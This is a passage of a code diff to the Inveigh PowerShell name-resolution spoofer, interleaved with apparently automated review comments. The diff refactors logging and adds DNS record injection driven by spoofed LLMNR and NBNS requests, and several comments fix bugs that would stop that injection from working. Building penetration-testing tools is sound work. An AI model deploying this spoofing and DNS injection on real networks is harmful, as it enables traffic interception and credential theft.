-
+
+ }
+ else
+ {
+ $LLMNR_response_message = SpooferResponseMessage -query_string $LLMNR_query_string -mDNS_type ""
}
if($LLMNR_request_data)
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
- }
-
+ $inveigh.output_queue.Add("$LLMNR_response_type [$(Get-Date -format s)] LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") > $null
}
$LLMNR_request_data = ""
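Review bot: The else branch near the end of this hunk stores the whole return value of SpooferResponseMessage in `$LLMNR_response_message` without splitting it, unlike the sniffer and NBNS paths in the same commit, so `$LLMNR_response_type` stays "[+]" for requests that were not answered and the log line prints the two-element array joined by a space. The branch should continue with `$LLMNR_response_type = $LLMNR_response_message[0]` and `$LLMNR_response_message = $LLMNR_response_message[1]`, mirroring the NBNS block. Separately, `$inveigh.requested_host_IP_list` and `$inveigh.requested_host_list` are plain ArrayLists appended from the LLMNR and NBNS runspaces concurrently; unless they are created through `[System.Collections.ArrayList]::Synchronized()` (not visible here) a race can corrupt them. The enclosing receive loop starts and ends outside the hunk.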
@@ -3199,19 +3033,8 @@ $mDNS_spoofer_scriptblock =
}
catch
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting mDNS spoofer")
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Error starting mDNS spoofer") > $null
$mDNS_running = $false
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting mDNS spoofer")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Error starting mDNS spoofer")
- }
-
}
$mDNS_multicast_group = [IPAddress]"224.0.0.251"
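Review bot: As with the LLMNR catch, the new "Error starting mDNS spoofer" message drops the exception, so a bind failure on UDP 5353 (commonly held by Bonjour/mDNSResponder on workstations) is indistinguishable from any other cause. Suggest `$inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Error starting mDNS spoofer [$($_.Exception.Message)]") > $null`. The try block begins outside the hunk.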
@@ -3249,6 +3072,7 @@ $mDNS_spoofer_scriptblock =
$mDNS_query_string = DataToString 13 $mDNS_request_data[12] $mDNS_request_data
$mDNS_query_string_full = $mDNS_query_string + ".local"
$source_IP = $mDNS_listener_endpoint.Address.IPAddressToString
+ $mDNS_response_type = "[+]"
if(!$Inspect -and ($mDNS_request_data -and $mDNS_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $mDNS_query_string) -and (
!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $mDNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and (
@@ -3262,60 +3086,18 @@ $mDNS_spoofer_scriptblock =
$mDNS_multicast_group = [IPAddress]"224.0.0.251"
$mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group)
$mDNS_UDP_client.Client.ReceiveTimeout = 5000
- $mDNS_response_message = "- response sent"
+ $mDNS_response_message = "[spoofed response sent]"
}
else
{
-
- if($Inspect)
- {
- $mDNS_response_message = "- inspect only"
- }
- elseif($mDNSTypes -notcontains 'QU')
- {
- $mDNS_response_message = "- disabled mDNS type"
- }
- elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $mDNS_query_string)
- {
- $mDNS_response_message = "- $mDNS_query_string is not on reply list"
- }
- elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $mDNS_query_string)
- {
- $mDNS_response_message = "- $mDNS_query_string is on ignore list"
- }
- elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
- {
- $mDNS_response_message = "- $source_IP is not on reply list"
- }
- elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
- {
- $mDNS_response_message = "- $source_IP is on ignore list"
- }
- elseif($inveigh.IP_capture_list -contains $source_IP)
- {
- $mDNS_response_message = "- previous capture from $source_IP"
- }
- else
- {
- $mDNS_response_message = "- something went wrong"
- }
-
+ $mDNS_response_message = SpooferResponseMessage -query_string $mDNS_query_string -mDNS_type "QU"
+ $mDNS_response_type = $mDNS_response_message[0]
+ $mDNS_response_message = $mDNS_response_message[1]
}
if($mDNS_request_data)
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - mDNS(QU) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
- }
-
+ $inveigh.output_queue.Add("$mDNS_response_type [$(Get-Date -format s)] mDNS(QU) request $mDNS_query_string_full received from $source_IP $LLMNR_response_message") > $null
}
$mDNS_request_data = ""
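Review bot: The mDNS(QU) log line at the end of this hunk interpolates `$LLMNR_response_message`, which is not one of the arguments passed to the mDNS spoofer scriptblock, so the status text ("[spoofed response sent]" or the ignore reason) will be empty for every QU request; the QM path in the following hunk uses the correct variable. It should read `$inveigh.output_queue.Add("$mDNS_response_type [$(Get-Date -format s)] mDNS(QU) request $mDNS_query_string_full received from $source_IP $mDNS_response_message") > $null`. The enclosing receive loop starts and ends outside the hunk.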
@@ -3334,6 +3116,7 @@ $mDNS_spoofer_scriptblock =
$mDNS_query_string = DataToString 13 $mDNS_request_data[12] $mDNS_request_data
$mDNS_query_string_full = $mDNS_query_string + ".local"
$source_IP = $mDNS_listener_endpoint.Address.IPAddressToString
+ $mDNS_response_type = "[+]"
if(!$Inspect -and ($mDNS_request_data -and $mDNS_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $mDNS_query_string) -and (
!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $mDNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and (
@@ -3347,60 +3130,18 @@ $mDNS_spoofer_scriptblock =
$mDNS_multicast_group = [IPAddress]"224.0.0.251"
$mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group)
$mDNS_UDP_client.Client.ReceiveTimeout = 5000
- $mDNS_response_message = "- response sent"
+ $mDNS_response_message = "[spoofed response sent]"
}
else
{
-
- if($Inspect)
- {
- $mDNS_response_message = "- inspect only"
- }
- elseif($mDNSTypes -notcontains 'QM')
- {
- $mDNS_response_message = "- disabled mDNS type"
- }
- elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $mDNS_query_string)
- {
- $mDNS_response_message = "- $mDNS_query_string is not on reply list"
- }
- elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $mDNS_query_string)
- {
- $mDNS_response_message = "- $mDNS_query_string is on ignore list"
- }
- elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
- {
- $mDNS_response_message = "- $source_IP is not on reply list"
- }
- elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
- {
- $mDNS_response_message = "- $source_IP is on ignore list"
- }
- elseif($inveigh.IP_capture_list -contains $source_IP)
- {
- $mDNS_response_message = "- previous capture from $source_IP"
- }
- else
- {
- $mDNS_response_message = "- something went wrong"
- }
-
+ $mDNS_response_message = SpooferResponseMessage -query_string $mDNS_query_string -mDNS_type "QM"
+ $mDNS_response_type = $mDNS_response_message[0]
+ $mDNS_response_message = $mDNS_response_message[1]
}
if($mDNS_request_data)
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - mDNS(QM) request for $mDNS_query_string_full received from $source_IP $mDNS_response_message")
- }
-
+ $inveigh.output_queue.Add("$mDNS_response_type [$(Get-Date -format s)] mDNS(QM) request $mDNS_query_string_full received from $source_IP $mDNS_response_message") > $null
}
$mDNS_request_data = ""
@@ -3425,19 +3166,8 @@ $NBNS_spoofer_scriptblock =
}
catch
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting NBNS spoofer")
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Error starting NBNS spoofer") > $null
$NBNS_running = $false
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting NBNS spoofer")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Error starting NBNS spoofer")
- }
-
}
$NBNS_UDP_client.Client.ReceiveTimeout = 5000
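Review bot: The new "Error starting NBNS spoofer" message discards the exception; UDP 137 is normally owned by the NetBIOS service on Windows, so this is the spoofer most likely to fail to bind and the operator needs to see why. Suggest `$inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Error starting NBNS spoofer [$($_.Exception.Message)]") > $null`. The try block begins outside the hunk.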
@@ -3475,6 +3205,7 @@ $NBNS_spoofer_scriptblock =
$source_IP = $NBNS_listener_endpoint.Address.IPAddressToString
$NBNS_query_type = [System.BitConverter]::ToString($NBNS_request_data[43..44])
+ $NBNS_response_type = "[+]"
switch ($NBNS_query_type)
{
@@ -3552,64 +3283,30 @@ $NBNS_spoofer_scriptblock =
$NBNS_UDP_client.Close()
$NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137
$NBNS_UDP_client.Client.ReceiveTimeout = 5000
- $NBNS_response_message = "- response sent"
- }
- else
- {
+ $NBNS_response_message = "[spoofed response sent]"
- if($Inspect)
- {
- $NBNS_response_message = "- inspect only"
- }
- elseif($NBNSTypes -notcontains $NBNS_query_type)
- {
- $NBNS_response_message = "- disabled NBNS type"
- }
- elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $NBNS_query_string)
- {
- $NBNS_response_message = "- $NBNS_query_string is not on reply list"
- }
- elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $NBNS_query_string)
- {
- $NBNS_response_message = "- $NBNS_query_string is on ignore list"
- }
- elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
- {
- $NBNS_response_message = "- $source_IP is not on reply list"
- }
- elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
- {
- $NBNS_response_message = "- $source_IP is on ignore list"
- }
- elseif($inveigh.IP_capture_list -contains $source_IP)
+ if($inveigh.requested_host_IP_list -NotContains "$source_IP $NBNS_query_string")
{
- $NBNS_response_message = "- previous capture from $source_IP"
+ $inveigh.requested_host_IP_list.Add("$source_IP $NBNS_query_string") > $null
+ $inveigh.requested_host_list.Add($NBNS_query_string.ToLower()) > $null
}
- elseif($source_IP -eq $IP)
- {
- $NBNS_response_message = "- local request"
- }
- else
+
+ if($inveigh.DNS)
{
- $NBNS_response_message = "- something went wrong"
+ DNSCheck $SpooferIP $DNSHostsIgnore $DNSThreshold $DNSTTL
}
-
+
+ }
+ else
+ {
+ $NBNS_response_message = SpooferResponseMessage -query_string $NBNS_query_string -mDNS_type ""
+ $NBNS_response_type = $NBNS_response_message[0]
+ $NBNS_response_message = $NBNS_response_message[1]
}
if($NBNS_request_data)
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
- }
-
+ $inveigh.output_queue.Add("$NBNS_response_type [$(Get-Date -format s)] NBNS request $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") > $null
}
$NBNS_request_data = ""
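Review bot: The NBNS name taken straight from the wire is recorded in `requested_host_list` and, if DNSCheck feeds repeated names to Invoke-DNSUpdate as the commit message describes (DNSCheck itself is not in this chunk), it becomes the name of a DNS record written into the domain; nothing here rejects names that are not valid DNS labels. A guard before the `.Add` calls such as `if($NBNS_query_string -match '^[A-Za-z0-9-]{1,63}$')` would keep hostile or malformed queries from turning into odd records. Also note the two lists disagree on case: `requested_host_IP_list` stores the raw name while `requested_host_list` stores `.ToLower()`, which matters if either is later compared with `-ccontains` or used as a hashtable key. The enclosing switch/loop starts and ends outside the hunk.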
@@ -3659,22 +3356,12 @@ $NBNS_bruteforce_spoofer_scriptblock =
([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() +
0x00,0x00,0x00,0x00
- $inveigh.console_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget")
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget") > $null
$NBNS_paused = $false
$NBNS_bruteforce_UDP_client = New-Object System.Net.Sockets.UdpClient(137)
$destination_IP = [System.Net.IPAddress]::Parse($NBNSBruteForceTarget)
$destination_point = New-Object Net.IPEndpoint($destination_IP,137)
$NBNS_bruteforce_UDP_client.Connect($destination_point)
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget")
- }
while($inveigh.running)
{
@@ -3684,19 +3371,8 @@ $NBNS_bruteforce_spoofer_scriptblock =
if($NBNS_paused)
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer")
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Resuming NBNS brute force spoofer") > $null
$NBNS_paused = $false
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer")
- }
-
}
for ($i = 0; $i -lt 255; $i++)
@@ -3710,20 +3386,9 @@ $NBNS_bruteforce_spoofer_scriptblock =
if($inveigh.hostname_spoof -and $NBNSBruteForcePause)
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer")
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Pausing NBNS brute force spoofer") > $null
$NBNS_paused = $true
break NBNS_spoofer_loop
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer")
- }
-
}
}
@@ -3745,6 +3410,32 @@ $control_scriptblock =
$inveigh.control = $true
+ function OutputQueueLoop
+ {
+
+ while($inveigh.output_queue.Count -gt 0)
+ {
+
+ if($inveigh.console_output)
+ {
+ $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null
+ }
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add($inveigh.output_queue[0]) > $null
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($inveigh.output_queue[0]) > $null
+ }
+
+ $inveigh.output_queue.RemoveAt(0)
+ }
+
+ }
+
function StopInveigh
{
param ([String]$exit_message)
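Review bot: OutputQueueLoop pops `$inveigh.output_queue` with `RemoveAt(0)` while every spoofer, sniffer and relay runspace appends to the same ArrayList; ArrayList is not safe for concurrent Add/RemoveAt, so unless the queue is created with `[System.Collections.ArrayList]::Synchronized(...)` where `$inveigh` is initialised (not visible in this chunk) a message can be lost or an InvalidOperationException raised in the control runspace. Wrapping the queue at creation, or guarding this loop with `[System.Threading.Monitor]::Enter($inveigh.output_queue.SyncRoot)` / `Exit`, would close the window. A short header comment would also help: `# Single consumer for output_queue: fans each entry out to console, file and in-memory log, then removes it`. StopInveigh's body continues outside the hunk.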
@@ -3767,60 +3458,58 @@ $control_scriptblock =
}
catch
{
- $inveigh.console_queue.Add("SSL Certificate Deletion Error - Remove Manually")
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] SSL Certificate Deletion Error [Remove Manually]") > $null
+ }
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")
- }
+ }
- if($inveigh.log_output)
+ if($inveigh.DNS_list.Count -gt 0)
+ {
+
+ foreach($DNS_host in $inveigh.DNS_list)
+ {
+
+ if($DNS_host.StartsWith("1,"))
{
- $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")
+
+ $DNS_update = Invoke-DNSUpdate -DNSType A -DNSName $DNS_host.SubString(2)
+
+ if($DNS_update -eq "[+] DNS update successful")
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] DNS host (A) record for $($DNS_host.SubString(2)) removed")
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] DNS host (A) record for $($DNS_host.SubString(2)) remove failed")
+ }
+
}
}
+ $inveigh.DNS_list = New-Object System.Collections.ArrayList
+ $inveigh.requested_host_list = New-Object System.Collections.ArrayList
+ $inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList
}
- if($inveigh.running)
+ if($inveigh.relay_running)
{
Start-Sleep -S 1
- $inveigh.console_queue.Add("Inveigh exited due to $exit_message at $(Get-Date -format 's')")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message")
- }
-
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh Relay is exiting due to $exit_message") > $null
+ OutputQueueLoop
Start-Sleep -S 1
- $inveigh.running = $false
+ $inveigh.relay_running = $false
+
}
- if($inveigh.relay_running)
+ if($inveigh.running)
{
Start-Sleep -S 1
- $inveigh.console_queue.Add("Inveigh Relay exited due to $exit_message at $(Get-Date -format 's')")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited due to $exit_message")
- }
-
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh is exiting due to $exit_message") > $null
+ OutputQueueLoop
Start-Sleep -S 1
- $inveigh.relay_running = $false
-
- }
+ $inveigh.running = $false
+ }
$inveigh.HTTPS = $false
}
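Review bot: The two `$inveigh.output_queue.Add(...)` calls inside the DNS cleanup loop are missing the `> $null` every other Add in this commit carries, so the returned index leaks into the control runspace's output stream. More importantly, after the loop `$inveigh.DNS_list` is replaced with a fresh ArrayList even when a removal reported "remove failed", so the name of a record Inveigh injected into the domain is kept only in the log; keeping the failed entries (`$inveigh.DNS_list = $DNS_failed_list` built during the loop) would let Stop-Inveigh retry, and the failure message should say `[Remove Manually]` as the certificate message does. Success is also detected by comparing Invoke-DNSUpdate's output to the literal "[+] DNS update successful", which will silently turn into "remove failed" if that function's wording changes.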
@@ -3918,6 +3607,7 @@ $control_scriptblock =
}
+ OutputQueueLoop
Start-Sleep -m 5
}
@@ -3997,14 +3687,29 @@ function ProxyListener()
# Sniffer/Spoofer Startup Function
function SnifferSpoofer()
{
- $sniffer_runspace = [RunspaceFactory]::CreateRunspace()
+
+ if($inveigh.DNS)
+ {
+ $sniffer_initial_session_state = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()
+ $DNS_update_function_definition = Get-Content function:\Invoke-DNSUpdate
+ $DNS_update_function_entry = New-Object System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList "Invoke-DNSUpdate", $DNS_update_function_definition
+ $sniffer_initial_session_state.Commands.Add($DNS_update_function_entry)
+ $sniffer_runspace = [RunspaceFactory]::CreateRunspace($sniffer_initial_session_state)
+ }
+ else
+ {
+ $sniffer_runspace = [RunspaceFactory]::CreateRunspace()
+ }
+
$sniffer_runspace.Open()
$sniffer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
$sniffer_powershell = [PowerShell]::Create()
$sniffer_powershell.Runspace = $sniffer_runspace
$sniffer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+ $sniffer_powershell.AddScript($DNS_functions_scriptblock) > $null
$sniffer_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
- $sniffer_powershell.AddScript($sniffer_scriptblock).AddArgument($IP).AddArgument($LLMNR).AddArgument(
+ $sniffer_powershell.AddScript($sniffer_scriptblock).AddArgument($DNSHostsIgnore).AddArgument(
+ $DNSThreshold).AddArgument($DNSTTL).AddArgument($Evade).AddArgument($IP).AddArgument($LLMNR).AddArgument(
$LLMNR_response_message).AddArgument($LLMNRTTL).AddArgument($mDNS).AddArgument(
$mDNS_response_message).AddArgument($mDNSTypes).AddArgument($mDNSTTL).AddArgument(
$NBNS).AddArgument($NBNS_response_message).AddArgument($NBNSTypes).AddArgument($NBNSTTL).AddArgument(
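Review bot: `Get-Content function:\Invoke-DNSUpdate` throws if Invoke-DNSUpdate has not been imported into the session, which the commit message says is required, so SnifferSpoofer fails with a path error rather than a clear message. Check once before enabling DNS injection, e.g. `if($inveigh.DNS -and !(Get-Command Invoke-DNSUpdate -ErrorAction SilentlyContinue)) { throw "DNS injection requires Invoke-DNSUpdate in the current session" }`. The four new positional arguments (`$DNSHostsIgnore`, `$DNSThreshold`, `$DNSTTL`, `$Evade`) are prepended before `$IP`; the `param()` block of `$sniffer_scriptblock` is not in this chunk, so confirm it was reordered to match or every later argument shifts. The function body ends outside the hunk.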
@@ -4017,12 +3722,27 @@ function SnifferSpoofer()
# Unprivileged LLMNR Spoofer Startup Function
function LLMNRSpoofer()
{
+
+ if($inveigh.DNS)
+ {
+ $LLMNR_spoofer_initial_session_state = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()
+ $DNS_update_function_definition = Get-Content function:\Invoke-DNSUpdate
+ $DNS_update_function_entry = New-Object System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList "Invoke-DNSUpdate", $DNS_update_function_definition
+ $LLMNR_spoofer_initial_session_state.Commands.Add($DNS_update_function_entry)
+ $LLMNR_spoofer_runspace = [RunspaceFactory]::CreateRunspace($LLMNR_spoofer_initial_session_state)
+ }
+ else
+ {
+ $LLMNR_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
+ }
+
$LLMNR_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
$LLMNR_spoofer_runspace.Open()
$LLMNR_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
$LLMNR_spoofer_powershell = [PowerShell]::Create()
$LLMNR_spoofer_powershell.Runspace = $LLMNR_spoofer_runspace
$LLMNR_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+ $LLMNR_spoofer_powershell.AddScript($DNS_functions_scriptblock) > $null
$LLMNR_spoofer_powershell.AddScript($LLMNR_spoofer_scriptblock).AddArgument($Inspect).AddArgument(
$LLMNR_response_message).AddArgument($SpooferIP).AddArgument($SpooferHostsReply).AddArgument(
$SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument(
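Review bot: The unchanged line `$LLMNR_spoofer_runspace = [RunspaceFactory]::CreateRunspace()` immediately after the new if/else overwrites the runspace that was built with the Invoke-DNSUpdate session-state entry, so when `$inveigh.DNS` is set the LLMNR spoofer runs in a plain runspace and the DNSCheck call added to `$LLMNR_spoofer_scriptblock` will not find Invoke-DNSUpdate. That line should be deleted, as the commit already does for SnifferSpoofer and ControlLoop. The function body ends outside the hunk.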
@@ -4039,6 +3759,7 @@ function mDNSSpoofer()
$mDNS_spoofer_powershell = [PowerShell]::Create()
$mDNS_spoofer_powershell.Runspace = $mDNS_spoofer_runspace
$mDNS_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+ $mDNS_spoofer_powershell.AddScript($DNS_functions_scriptblock) > $null
$mDNS_spoofer_powershell.AddScript($mDNS_spoofer_scriptblock).AddArgument($Inspect).AddArgument(
$mDNS_response_message).AddArgument($mDNSTTL).AddArgument($mDNSTypes).AddArgument($SpooferIP).AddArgument(
$SpooferHostsReply).AddArgument($SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument(
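Review bot: `$DNS_functions_scriptblock` is now loaded into the mDNS runspace, but unlike the LLMNR and NBNS spoofers this runspace gets no Invoke-DNSUpdate session-state entry and the mDNS scriptblock hunks in this commit never call DNSCheck, so the addition appears to be dead weight. If excluding mDNS from DNS injection is deliberate, a one-line comment here (`# mDNS names are .local only; not fed to DNS injection`) would stop the next reader from "fixing" it; if not, the runspace construction needs the same `$inveigh.DNS` branch as the others. The function body starts and ends outside the hunk.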
@@ -4049,12 +3770,27 @@ function mDNSSpoofer()
# Unprivileged NBNS Spoofer Startup Function
function NBNSSpoofer()
{
+
+ if($inveigh.DNS)
+ {
+ $NBNS_spoofer_initial_session_state = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()
+ $DNS_update_function_definition = Get-Content function:\Invoke-DNSUpdate
+ $DNS_update_function_entry = New-Object System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList "Invoke-DNSUpdate", $DNS_update_function_definition
+ $NBNS_spoofer_initial_session_state.Commands.Add($DNS_update_function_entry)
+ $NBNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace($NBNS_spoofer_initial_session_state)
+ }
+ else
+ {
+ $NBNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
+ }
+
$NBNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace()
$NBNS_spoofer_runspace.Open()
$NBNS_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
$NBNS_spoofer_powershell = [PowerShell]::Create()
$NBNS_spoofer_powershell.Runspace = $NBNS_spoofer_runspace
$NBNS_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+ $NBNS_spoofer_powershell.AddScript($DNS_functions_scriptblock) > $null
$NBNS_spoofer_powershell.AddScript($NBNS_spoofer_scriptblock).AddArgument($Inspect).AddArgument(
$NBNS_response_message).AddArgument($SpooferIP).AddArgument($NBNSTypes).AddArgument(
$SpooferHostsReply).AddArgument($SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument(
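Review bot: Same defect as LLMNRSpoofer: the leftover `$NBNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace()` after the if/else discards the runspace carrying the Invoke-DNSUpdate function entry, so the DNSCheck call in the NBNS spoofer scriptblock will run without Invoke-DNSUpdate whenever `$inveigh.DNS` is enabled. Remove that line. The function body ends outside the hunk.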
@@ -4080,7 +3816,19 @@ function NBNSBruteForceSpoofer()
# Control Loop Startup Function
function ControlLoop()
{
- $control_runspace = [RunspaceFactory]::CreateRunspace()
+ if($inveigh.DNS)
+ {
+ $control_initial_session_state = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()
+ $DNS_update_function_definition = Get-Content function:\Invoke-DNSUpdate
+ $DNS_update_function_entry = New-Object System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList "Invoke-DNSUpdate", $DNS_update_function_definition
+ $control_initial_session_state.Commands.Add($DNS_update_function_entry)
+ $control_runspace = [RunspaceFactory]::CreateRunspace($control_initial_session_state)
+ }
+ else
+ {
+ $control_runspace = [RunspaceFactory]::CreateRunspace()
+ }
+
$control_runspace.Open()
$control_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
$control_powershell = [PowerShell]::Create()
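Review bot: This is the fourth verbatim copy of the "build an InitialSessionState with Invoke-DNSUpdate" block in this commit, and two of the copies already contain a bug the others do not, which is the usual cost of duplicating setup code. A small helper returning the runspace would let each startup function reduce to `$control_runspace = New-InveighRunspace` and keep the DNS-import logic in one place. The function body ends outside the hunk.

```powershell
function New-InveighRunspace
{
    # Build a runspace; when DNS injection is enabled, import the caller's Invoke-DNSUpdate into it
    if($inveigh.DNS)
    {
        $initial_session_state = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()
        $DNS_update_function_entry = New-Object System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList "Invoke-DNSUpdate", (Get-Content function:\Invoke-DNSUpdate)
        $initial_session_state.Commands.Add($DNS_update_function_entry)
        return [RunspaceFactory]::CreateRunspace($initial_session_state)
    }

    return [RunspaceFactory]::CreateRunspace()
}

# … unchanged: ControlLoop body, with the runspace obtained via New-InveighRunspace …
```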
@@ -4150,10 +3898,7 @@ if($NBNSBruteForce -eq 'Y')
}
# Control Loop Start
-if($ConsoleQueueLimit -ge 0 -or $inveigh.file_output -or $NBNSBruteForcePause -or $RunCount -or $RunTime)
-{
- ControlLoop
